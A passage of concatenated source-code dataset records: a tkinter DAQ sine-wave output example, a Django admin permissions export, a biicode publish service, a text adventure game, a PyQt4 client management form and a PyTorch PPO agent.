with sine wave data at the calculated frequencies.\n # Note that since we are using the SCALEDATA option, the values\n # added to data_array are the actual voltage values that the device\n # will output\n data_index = 0\n for point_num in range(0, points_per_channel):\n for channel_num in range(0, num_chans):\n freq = frequencies[channel_num]\n value = amplitude * math.sin(\n 2 * math.pi * freq * point_num / rate) + y_offset\n data_array[data_index] = value\n data_index += 1\n\n return frequencies\n\n def update_displayed_values(self):\n # Get the status from the device\n status, curr_count, curr_index = ul.get_status(\n self.board_num, FunctionType.AOFUNCTION)\n\n # Display the status info\n self.update_status_labels(status, 
curr_count, curr_index)\n\n # Call this method again until the stop button is pressed\n if status == Status.RUNNING:\n self.after(100, self.update_displayed_values)\n else:\n # Free the allocated memory\n ul.win_buf_free(self.memhandle)\n self.set_ui_idle_state()\n\n def update_status_labels(self, status, curr_count, curr_index):\n if status == Status.IDLE:\n self.status_label[\"text\"] = \"Idle\"\n else:\n self.status_label[\"text\"] = \"Running\"\n\n self.index_label[\"text\"] = str(curr_index)\n self.count_label[\"text\"] = str(curr_count)\n\n def recreate_freq_frame(self):\n low_chan = self.low_chan\n high_chan = self.high_chan\n\n new_freq_frame = tk.Frame(self.freq_inner_frame)\n\n curr_row = 0\n self.freq_labels = []\n for chan_num in range(low_chan, high_chan + 1):\n curr_row += 1\n channel_label = tk.Label(new_freq_frame)\n channel_label[\"text\"] = (\n \"Channel \" + str(chan_num) + \" Frequency:\")\n channel_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n freq_label = tk.Label(new_freq_frame)\n freq_label.grid(row=curr_row, column=1, sticky=tk.W)\n self.freq_labels.append(freq_label)\n\n self.freq_frame.destroy()\n self.freq_frame = new_freq_frame\n self.freq_frame.grid()\n\n def stop(self):\n ul.stop_background(self.board_num, FunctionType.AOFUNCTION)\n\n def exit(self):\n self.stop()\n self.master.destroy()\n\n def set_ui_idle_state(self):\n self.high_channel_entry[\"state\"] = tk.NORMAL\n self.low_channel_entry[\"state\"] = tk.NORMAL\n self.start_button[\"command\"] = self.start\n self.start_button[\"text\"] = \"Start\"\n\n def start(self):\n self.high_channel_entry[\"state\"] = tk.DISABLED\n self.low_channel_entry[\"state\"] = tk.DISABLED\n self.start_button[\"command\"] = self.stop\n self.start_button[\"text\"] = \"Stop\"\n self.start_scan()\n\n def get_low_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.low_channel_entry.get())\n except ValueError:\n return 0\n\n def get_high_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.high_channel_entry.get())\n except ValueError:\n return 0\n\n def validate_channel_entry(self, p):\n if p == '':\n return True\n try:\n value = int(p)\n if(value < 0 or value > self.ao_props.num_chans - 1):\n return False\n except ValueError:\n return False\n\n return True\n\n def create_widgets(self):\n '''Create the tkinter UI'''\n example_supported = (\n self.ao_props.num_chans > 0\n and self.ao_props.supports_scan)\n\n if example_supported:\n main_frame = tk.Frame(self)\n main_frame.pack(fill=tk.X, anchor=tk.NW)\n\n if self.ao_props.num_chans > 1:\n channel_vcmd = self.register(self.validate_channel_entry)\n\n curr_row = 0\n low_channel_entry_label = tk.Label(main_frame)\n low_channel_entry_label[\"text\"] = \"Low Channel Number:\"\n low_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.low_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.low_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n high_channel_entry_label = tk.Label(main_frame)\n high_channel_entry_label[\"text\"] = \"High Channel Number:\"\n high_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.high_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.high_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n 
initial_value = min(self.ao_props.num_chans - 1, 3)\n self.high_channel_entry.delete(0, tk.END)\n self.high_channel_entry.insert(0, str(initial_value))\n\n scan_info_group = tk.LabelFrame(\n self, text=\"Scan Information\", padx=3, pady=3)\n scan_info_group.pack(fill=tk.X, anchor=tk.NW, padx=3, pady=3)\n\n scan_info_group.grid_columnconfigure(1, weight=1)\n\n curr_row += 1\n status_left_label = tk.Label(scan_info_group)\n status_left_label[\"text\"] = \"Status:\"\n status_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.status_label = tk.Label(scan_info_group)\n self.status_label[\"text\"] = \"Idle\"\n self.status_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n index_left_label = tk.Label(scan_info_group)\n index_left_label[\"text\"] = \"Index:\"\n index_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.index_label = tk.Label(scan_info_group)\n self.index_label[\"text\"] = \"-1\"\n self.index_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n count_left_label = tk.Label(scan_info_group)\n count_left_label[\"text\"] = \"Count:\"\n count_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.count_label = tk.Label(scan_info_group)\n self.count_label[\"text\"] = \"0\"\n self.count_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n self.freq_inner_frame = tk.Frame(scan_info_group)\n self.freq_inner_frame.grid(\n row=curr_row, column=0, columnspan=2, sticky=tk.W)\n\n self.freq_frame = tk.Frame(self.freq_inner_frame)\n self.freq_frame.grid()\n\n button_frame = tk.Frame(self)\n button_frame.pack(fill=tk.X, side=tk.RIGHT, anchor=tk.SE)\n\n self.start_button = tk.Button(button_frame)\n self.start_button[\"text\"] = \"Start\"\n self.start_button[\"command\"] = self.start\n self.start_button.grid(row=0, column=0, padx=3, pady=3)\n\n quit_button = tk.Button(button_frame)\n quit_button[\"text\"] = \"Quit\"\n quit_button[\"command\"] = self.exit\n quit_button.grid(row=0, column=1, padx=3, pady=3)\n\n\nif __name__ == \"__main__\":\n # Start the example\n ULAO04(master=tk.Tk()).mainloop()\n","repo_name":"GMUSatCom/GMU-Thermal-Vac","sub_path":"examples/ui/ULAO04.py","file_name":"ULAO04.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
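A quick way to check the waveform math in add_example_data outside the UI: each channel's frequency is chosen as (channel + 1) full cycles per buffer, so a CONTINUOUS scan wraps with no discontinuity. A minimal standalone sketch of the same calculation (numpy only; the concrete numbers are illustrative):

```python
import numpy as np

rate, points_per_channel, num_chans = 1000, 1000, 2
amplitude, y_offset = 5.0, 0.0  # e.g. a +/-5 V output range

# (ch + 1) whole cycles per buffer -> seamless wrap in CONTINUOUS mode
freqs = [(ch + 1) / (points_per_channel / rate) for ch in range(num_chans)]
t = np.arange(points_per_channel) / rate
# interleave samples the way a_out_scan expects: ch0, ch1, ch0, ch1, ...
buf = np.column_stack(
    [amplitude * np.sin(2 * np.pi * f * t) + y_offset for f in freqs]).ravel()
assert buf.size == num_chans * points_per_channel
```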
+{"seq_id":"17663169814","text":"import zipfile\n\nfrom django.contrib import admin\nfrom django.core import serializers\nfrom django.http import HttpResponse\nimport io\nfrom auth_and_perms import models\n\n@admin.action(description='Export Laboratory')\ndef export_rol_perms(admin, request, queryset):\n buffer = io.BytesIO()\n zip_file = zipfile.ZipFile(buffer, 'w')\n\n\n for rol in queryset:\n rols=models.ProfilePermission.objects.filter(rol=rol)\n zip_file.writestr(rol.name+\".json\", serializers.serialize('json', rols))\n zip_file.close()\n buffer.seek(0)\n response = HttpResponse(buffer.getvalue(),\n content_type='application/x-zip-compressed',\n headers={'Content-Disposition': 'attachment; filename=\"permissionsrol.zip\"'})\n return response\n\n\nclass RolAdmin(admin.ModelAdmin):\n filter_horizontal = ['permissions']\n actions = [export_rol_perms]\n\n\nclass AuthorizedApplicationAdmin(admin.ModelAdmin):\n list_display = ['name', 'auth_token']\n\n @admin.display(empty_value='unknown')\n def auth_token(self, obj):\n if obj.user:\n return obj.user.auth_token.key\n return 'unknown'\n\n\nadmin.site.register(models.AuthorizedApplication, AuthorizedApplicationAdmin)\nadmin.site.register(models.Profile)\nadmin.site.register(models.Rol, RolAdmin)\nadmin.site.register(models.ProfilePermission)","repo_name":"Solvosoft/organilab","sub_path":"src/auth_and_perms/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"31155615417","text":"from biicode.server.model.block import Block\nfrom biicode.common.exception import (ForbiddenException, PublishException, NotFoundException,\n ServerInternalErrorException, NotInStoreException,\n BiiRequestErrorException, BiiServiceException,\n AlreadyInStoreException)\nfrom biicode.server.exception import DuplicateBlockException\nfrom biicode.common.utils.bii_logging import logger\nimport traceback\nfrom biicode.server.authorize import Security\nfrom biicode.common.model.block_info import BlockInfo\nfrom biicode.common.model.symbolic.block_version import BlockVersion\nfrom biicode.common.model.version_tag import DEV\n\n\nclass PublishService(object):\n ''' Service for publish blocks in server.'''\n def __init__(self, store, auth_user):\n self._store = store\n self.auth_user = auth_user\n self.security = Security(self.auth_user, self._store)\n\n def publish(self, publish_request):\n '''Performs a publication\n TIP: If we add publish_request to transaction_definition we can easily have asynchronous\n publications\n\n private: Only for first publication\n '''\n from biicode.server.background.enqueuer import register_publish\n\n if publish_request.tag == DEV:\n if not publish_request:\n raise BiiRequestErrorException('Up to date, nothing to publish')\n if publish_request.versiontag is not None:\n raise PublishException('A DEV version cannot have tag %s' % publish_request.tag)\n\n assert publish_request.deptable is not None\n\n # by default it is public\n # TODO: BLock creation is not handled in the transaction\n target_version = publish_request.parent\n user = self._store.read_user(target_version.block.owner)\n # Look if user has the block already created, because the block\n # can exist with -1 version if it has been created in web\n if target_version.block not in user.blocks.keys():\n try:\n if target_version != publish_request.parent: # Branching\n user = self.create_block(target_version.block,\n publish_request.parent, private=False)\n else:\n user = self.create_block(target_version.block, private=False)\n except DuplicateBlockException:\n pass # Its ok, already created\n\n target_block = target_version.block\n self._store.requestBlockTransaction(target_block)\n try:\n # If we can't read the block, we can't know about his existence\n self.security.check_read_block(target_block)\n self.security.check_publish_block(target_block, publish_request)\n # biiresponse.debug('Read block \"%s\"' % brl_block)\n block = self._store.read_block(target_block)\n (cells, contents,\n old_cells_ids, old_content_ids) = self._in_memory_block_update(block, publish_request)\n except ForbiddenException:\n self._store.finishBlockTransaction(target_block)\n raise\n except PublishException as e:\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException(e.message)\n except Exception as excp:\n logger.error(\"Exception in publish service!!: %s \" % str(excp))\n tb = traceback.format_exc()\n logger.error(tb)\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException()\n\n self._store.beginBlockTransaction(target_block, cells, contents)\n try:\n self._write_resources_to_db(cells, contents, old_cells_ids, old_content_ids)\n self._store.update_block(block)\n self._store.commitBlockTransaction(target_block)\n register_publish(self.auth_user, block.last_version())\n self._store.finishBlockTransaction(target_block)\n\n # Need to read user again, otherwise will raise MongoNotCurrentObjectException\n # because of double update of same 
memory object\n user = self._store.read_user(target_version.block.owner)\n user.add_block_size_bytes(target_version.block, publish_request.bytes)\n # Save user (with block bytes updated)\n self._store.update_user(user)\n\n return block.last_version()\n\n except Exception as excp:\n tb = traceback.format_exc()\n logger.debug(tb)\n self._rollback_transaction(excp, target_block)\n raise ServerInternalErrorException('Publish transaction failed. Please, retry')\n\n def create_block(self, brl, private=False):\n '''Creates a block in server due the brl and description'''\n self.security.check_create_block(brl.owner, private)\n user = self._store.read_user(brl.owner)\n try:\n block_id = user.add_block(brl) # should fail if existing\n except DuplicateBlockException:\n logger.debug('Block %s already existing, not creating it' % brl)\n raise\n\n block = Block(block_id, brl)\n try: # FIXME: better upsert?\n self._store.create_block(block, private) # should fail if existing\n except AlreadyInStoreException:\n pass\n self._store.update_user(user) # raise exception if not current\n\n return user\n\n def _rollback_transaction(self, excp, brl_block):\n '''rollback transaction for publish'''\n logger.warning(str(excp) + '\\nRolling back publish transaction')\n self._store.rollBackBlockTransaction(brl_block)\n self._store.finishBlockTransaction(brl_block)\n\n def _write_resources_to_db(self, cells, contents, old_cells_ids, old_content_ids):\n '''Write cells and contents to db'''\n if old_cells_ids:\n self._store.delete_published_cells(old_cells_ids)\n if old_content_ids:\n self._store.delete_published_contents(old_content_ids)\n if cells:\n self._store.create_published_cells(cells)\n if contents:\n self._store.create_published_contents(contents)\n\n # @mongo_update_if_current_safe_retry\n # def __update_user_if_current(self, user):\n def _set_cell_roots(self, block, publish_request):\n '''Set cell root'''\n # Ensure here root assignment\n old_ids = {}\n deltas = block.deltas\n last_time = len(deltas) - 2\n\n for res in publish_request.cells:\n old_name = publish_request.renames.get_old_name(res.name.cell_name)\n old_id = block.cells.get_id(old_name, last_time)\n if old_id:\n old_ids[old_id] = res\n else:\n res.root = res.ID\n old_cells = self._store.read_published_cells(old_ids.keys())\n for old_id, old_cell in old_cells.iteritems():\n res = old_ids[old_id]\n res.root = old_cell.root\n\n def _in_memory_block_update(self, block, publish_request):\n '''Updates block in memory'''\n self.security.check_write_block(block.ID)\n cells, contents, old_cells_ids, old_content_ids = block.add_publication(publish_request,\n self.auth_user)\n self._set_cell_roots(block, publish_request)\n return cells, contents, old_cells_ids, old_content_ids\n\n def get_block_info(self, brl_block):\n '''Check if auth_user can publish a block version specified by parameter block_version\n Returns:\n BlockInfo\n '''\n\n try:\n self.security.check_read_block(brl_block)\n except NotInStoreException:\n # In this case, the block doesnt exist, but return information of -1 and permissions\n return self._get_new_block_info(brl_block)\n\n block_info = BlockInfo()\n try:\n self.security.check_write_block(brl_block)\n block_info.can_write = True\n except ForbiddenException:\n block_info.can_write = False\n\n try:\n block = self._store.read_block(brl_block)\n block_info.last_version = block.last_version()\n block_info.private = self.security.is_private(brl_block)\n except Exception as e:\n tb = traceback.format_exc()\n logger.debug(tb)\n 
logger.error(\"Something went wrong with %s\" % e)\n raise BiiServiceException('Something went wrong')\n\n return block_info\n\n def _get_new_block_info(self, brl_block):\n '''\n Returns BlockInfo that new block would have if we publish it.\n Raises exception if block cannot be created for any reason\n '''\n last_version = BlockVersion(brl_block, -1)\n can_write = False\n try:\n self.security.check_create_block(brl_block.owner)\n can_write = True\n except ForbiddenException:\n can_write = False\n except NotInStoreException:\n raise NotFoundException(\"Block %s not found!\" % brl_block.to_pretty())\n\n return BlockInfo(can_write=can_write, last_version=last_version)\n","repo_name":"biicode/bii-server","sub_path":"publish/publish_service.py","file_name":"publish_service.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"19"}
+{"seq_id":"16942244441","text":"name = input('Type your name:')\nprint('Welcome',name,'to this adventure!')\n\nanswer = input ('You are on dirt road, it has come to an end and you can go left or right. Which way would you like to go?').lower()#Makes all the letters small for the program.\n\nif answer == 'left':\n answer = input(\"You come to a river, you can walk around it or swim across, walk or swim?\")\n\n if answer == \"swim\":\n print(\"You swam across and were eaten by an alligator.\")\n\n elif answer == \"walk\":\n print(\"You walked for many miles, ran out of water and lost the game\")\n \n\n else:\n print(\"Not a valid option. You lose.\")\n\n \n \nelif answer == \"right\":\n print (\"Not a valid option. You lose.\")\n","repo_name":"Baller321/Small-python-projects","sub_path":"choose_your_own_adventure.py","file_name":"choose_your_own_adventure.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"28616212212","text":"# coding: latin-1\r\n__author__ = 'waldo'\r\nfrom gui import MdiWidget, CRUDWidget\r\nfrom ventanas import Ui_vtnCliente\r\nfrom validarDatos import ValidarDatos\r\nfrom baseDatos import Cliente as ClienteModel\r\nfrom baseDatos import Remito as RemitoModel\r\nfrom PyQt4 import QtGui\r\nclass Cliente(CRUDWidget, Ui_vtnCliente):\r\n \"\"\"\r\n Lógica del ABM de clientes.\r\n \"\"\"\r\n def __init__(self, mdi):\r\n \"\"\"\r\n Constructor de la clase Cliente.\r\n :param mdi:\r\n :return:\r\n \"\"\"\r\n MdiWidget.__init__(self, mdi)\r\n self.sesion = self.mdi().window().getSesionBD()\r\n self.validadores(ClienteModel)\r\n\r\n def cargarClientes(self):\r\n \"\"\"\r\n Carga los datos de los clientes en las tablas de las ventanas (Baja y Modificación).\r\n :return:\r\n \"\"\"\r\n self.cargarObjetos(self.tableClientes,\r\n ClienteModel.buscarTodos(\"dni\", self.sesion).all(),\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def crear(self):\r\n \"\"\"\r\n Da de alta un cliente nuevo y lo almacena en la base de datos.\r\n :return:\r\n \"\"\"\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n cliente = ClienteModel(str(self.lineDni.text()), str(self.lineNombre.text()),\r\n str(self.lineApellido.text()), str(self.lineDireccion.text()),\r\n str(self.lineTelefono.text()))\r\n if cliente.guardar(self.sesion):\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n cliente = ClienteModel.buscar(ClienteModel.dni, self.sesion,\r\n str(self.lineDni.text())).first()\r\n if cliente.getBaja():\r\n cliente.setBaja(False)\r\n cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'El Cliente ya existe.', 'Aceptar')\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n\r\n def eliminar(self):\r\n \"\"\"\r\n Da de baja el cliente selecionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual==None:\r\n self.showMsjEstado(\"No se ha seleccionado ningun Cliente de la tabla\")\r\n else:\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n if self.bajaValida(dni):\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.borrar(self.sesion)\r\n self.showMsjEstado(\"El Cliente ha sido dado de baja\")\r\n self.tableClientes.removeRow(row)\r\n self.objectDeleted.emit()\r\n self.actualizar()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'Existen remitos pendientes de pago para dicho '\r\n 'Cliente.', 'Aceptar')\r\n\r\n def modificar(self):\r\n \"\"\"\r\n Modifica los datos del cliente seleccionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual!=None:\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.setNombre(str(self.lineNombre.text()))\r\n self.cliente.setApellido(str(self.lineApellido.text()))\r\n self.cliente.setDireccion(str(self.lineDireccion.text()))\r\n self.cliente.setTelefono(str(self.lineTelefono.text()))\r\n 
self.cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El cliente fue modificado\")\r\n self.objectModified.emit()\r\n self.actualizar()\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n else:\r\n self.showMsjEstado(\"No se ha seleccionado un Cliente de la tabla\")\r\n\r\n def bajaValida(self, dni):\r\n \"\"\"\r\n Verifica que el cliente no posea remitos sin pagar.\r\n :param dni: DNI del cliente para el cual se realiza la verificación.\r\n :return: bool\r\n \"\"\"\r\n remito = RemitoModel.buscarAlta(RemitoModel.cliente, self.sesion, dni).all()\r\n for r in remito:\r\n if r.getCobrado() == None:\r\n return False\r\n return True\r\n\r\n def cargarCamposBaja(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Baja).\r\n :return:\r\n \"\"\"\r\n self.lineNombre.setEnabled(False)\r\n self.lineApellido.setEnabled(False)\r\n self.cargarCamposMod()\r\n\r\n def buscar(self):\r\n \"\"\"\r\n Busca al cliente de acuerdo a la información ingresada y carga los datos en la tabla (Baja y Modificaión).\r\n :return:\r\n \"\"\"\r\n obj = self.sender().objectName()\r\n if obj == 'lineDni':\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif obj == 'lineNombre':\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif obj == 'lineApellido':\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n elif obj == 'btnBuscar':\r\n if str(self.lineDni.text()) != \"\":\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif str(self.lineNombre.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif str(self.lineApellido.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n else:\r\n self.showMsjEstado(\"Ingrese DNI, Nombre o Apellido del Cliente para realizar la\"\r\n \" busqueda.\")\r\n return\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarObjetos(self.tableClientes, clientes,\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def actualizar(self):\r\n \"\"\"\r\n Actualiza los componentes de las ventanas.\r\n :return:\r\n \"\"\"\r\n self.limpiarCampos()\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarClientes()\r\n\r\n def limpiarCampos(self):\r\n \"\"\"\r\n Vacia los campos de la ventana.\r\n :return:\r\n \"\"\"\r\n self.lineDni.clear()\r\n self.lineDni.setEnabled(True)\r\n self.lineNombre.clear()\r\n self.lineNombre.setEnabled(True)\r\n self.lineApellido.clear()\r\n self.lineApellido.setEnabled(True)\r\n self.lineDireccion.clear()\r\n self.lineTelefono.clear()\r\n self.tableClientes.setCurrentItem(None)\r\n\r\n def cargarCamposMod(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Modificación).\r\n :return:\r\n \"\"\"\r\n self.lineDni.setEnabled(False)\r\n row=self.tableClientes.currentItem().row()\r\n infoItem=[]\r\n for col in range(0,self.tableClientes.columnCount()):\r\n infoItem.append(self.tableClientes.item(row,col).text())\r\n #Cargar la info del item en los lines\r\n self.lineDni.setText(infoItem[0])\r\n self.lineNombre.setText(infoItem[1])\r\n self.lineApellido.setText(infoItem[2])\r\n self.lineDireccion.setText(infoItem[3])\r\n 
self.lineTelefono.setText(infoItem[4])\r\n\r\n @classmethod\r\n def create(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Alta Cliente.\r\n :param mdi: referencia a la ventana Alta Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).create(mdi)\r\n gui.groupBuscar.hide()\r\n gui.btnBuscar.hide()\r\n gui.btnAceptar.pressed.connect(gui.crear)\r\n gui.btnCancelar.pressed.connect(gui.limpiarCampos)\r\n return gui\r\n\r\n @classmethod\r\n def delete(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Baja Cliente.\r\n :param mdi: referencia a la ventana Baja Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).delete(mdi)\r\n gui.lineDireccion.setEnabled(False)\r\n gui.lineTelefono.setEnabled(False)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.cargarClientes()\r\n gui.btnAceptar.pressed.connect(gui.eliminar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposBaja)\r\n return gui\r\n\r\n @classmethod\r\n def update(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Modificación Cliente.\r\n :param mdi: referencia a la ventana Modificación Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).update(mdi)\r\n gui.cargarClientes()\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposMod)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.btnAceptar.pressed.connect(gui.modificar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n return gui\r\n\r\n","repo_name":"UNPSJB/FarmaciaCrisol","sub_path":"gestionClientes/lgClientes.py","file_name":"lgClientes.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
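cargarObjetos is inherited from CRUDWidget and is not shown in this file; judging from the call sites, its job is to fill a QTableWidget with one row per model object. A rough PyQt4 sketch of that behaviour (the signature is assumed from usage, not taken from the project):

```python
from PyQt4 import QtGui

def cargar_objetos(table, objects, fields):
    """Fill a QTableWidget: one row per object, one column per field name."""
    table.setRowCount(len(objects))
    for row, obj in enumerate(objects):
        for col, field in enumerate(fields):
            item = QtGui.QTableWidgetItem(str(getattr(obj, field, "")))
            table.setItem(row, col, item)
```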
+{"seq_id":"5164916032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nfrom Network import Actor, Critic\n\nclass PPO:\n def __init__(self,\n s_dim=3,\n a_dim=1,\n bound=2,\n actor_lr=1e-4,\n critic_lr=2e-4,\n update_step_a=10,\n update_step_c=10,\n gamma=0.9,\n epsilon=0.2):\n # Parameter initialization\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.bound = bound\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.update_step_a = update_step_a\n self.update_step_c = update_step_c\n self.gamma = gamma\n self.epsilon = epsilon\n\n # network initialization\n self.actor = Actor(s_dim, a_dim, bound)\n self.actor_old = Actor(s_dim, a_dim, bound)\n self.actor_old.load_state_dict(self.actor.state_dict())\n self.actor_opt = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr)\n self.critic = Critic(s_dim)\n self.critic_opt = torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr)\n\n # memory initialization\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def get_action(self, s):\n # select action w.r.t the actions prob\n s = torch.FloatTensor(s)\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n a = dist.sample()\n a = torch.clamp(a, -self.bound, self.bound)\n return a.item()\n\n def get_v(self, s):\n # the state value\n s = torch.FloatTensor(s)\n with torch.no_grad():\n v = self.critic(s)\n return v.item()\n\n def calculate_log_prob(self, s, a, old=False):\n # s.shape = [batch, s_dim], a.shape = [batch, a_dim]\n # mu.shape = sigma.shape = log_prob.shape = [batch, a_dim]\n if old:\n with torch.no_grad():\n mu, sigma = self.actor_old(s)\n else:\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n log_prob = dist.log_prob(a)\n return log_prob\n\n def learn(self, s, a, s_, r, done):\n # store transition\n self.memory_s.append(s)\n self.memory_a.append(a)\n self.memory_r.append(r)\n if done:\n # calculate the discounted reward\n discounted_r = []\n v_ = self.get_v(s_)\n for t in range(len(self.memory_r) - 1, -1, -1):\n v_ = self.memory_r[t] + self.gamma * v_\n discounted_r.insert(0, v_)\n s = torch.FloatTensor(self.memory_s)\n a = torch.FloatTensor(self.memory_a).unsqueeze(dim=-1)\n r = torch.FloatTensor(discounted_r).unsqueeze(dim=-1)\n # start to update network\n self.actor_old.load_state_dict(self.actor.state_dict())\n old_log_prob = self.calculate_log_prob(s, a, old=True)\n with torch.no_grad():\n advantage = r - self.critic(s)\n for _ in range(self.update_step_a):\n self.update_actor(s, a, advantage, old_log_prob)\n for _ in range(self.update_step_c):\n self.update_critic(s, r)\n # empty the memory\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def update_actor(self, s, a, advantage, old_log_prob):\n # calculate the loss\n log_prob = self.calculate_log_prob(s, a)\n ratio = torch.exp(log_prob - old_log_prob)\n surr1 = ratio*advantage\n surr2 = torch.clamp(ratio, 1.0 - self.epsilon,\n 1.0 + self.epsilon) * advantage\n loss = -torch.mean(torch.min(surr1, surr2))\n # update\n self.actor_opt.zero_grad()\n loss.backward()\n self.actor_opt.step()\n\n def update_critic(self, s, r):\n # calculate critic loss\n v = self.critic(s)\n advantage = r - v\n loss = torch.mean(advantage**2)\n # update\n self.critic_opt.zero_grad()\n loss.backward()\n self.critic_opt.step()","repo_name":"Parisfal/DRL-Pytorch-Tutorial","sub_path":"4.1 
PPO1/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
